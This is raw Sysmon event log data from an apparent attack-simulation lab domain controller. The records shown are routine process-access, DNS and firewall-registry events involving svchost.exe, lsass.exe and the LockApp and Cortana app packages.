13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.373{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.373{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000010032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.955{00000000-0000-0000-0000-000000000000}4712win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;<unknown process> 10341000x800000000000000010031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.092{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.092{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.092{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.092{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.982{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.982{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.982{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.982{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|M=microsoft.lockapp_cw5n1h2txyewy|Name=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\|PFN=Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{FC682AA0-D3E2-421C-AF98-A6C847834199}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4D9D32E9-C477-4691-839B-17402683D703}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D48AA424-D155-4376-8A93-5612D2241772}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{766E73FF-1440-4DC8-ADFA-4775A3F645B1}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{1851F559-3766-47C8-A5FD-17B8705CAC4B}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ|Edge=TRUE| 13241300x800000000000000010478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{14BE8CCD-FAE6-4A55-BA48-AD000E42701D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{8177A537-ECA6-4701-AEDF-E1C514F6C8FF}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A8A84907-48F8-421E-A5E8-29A31545419F}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{38C40082-0D33-4D2F-86FC-D5DDB8983A25}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0647C025-9366-496F-954F-B7E0731EC946}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 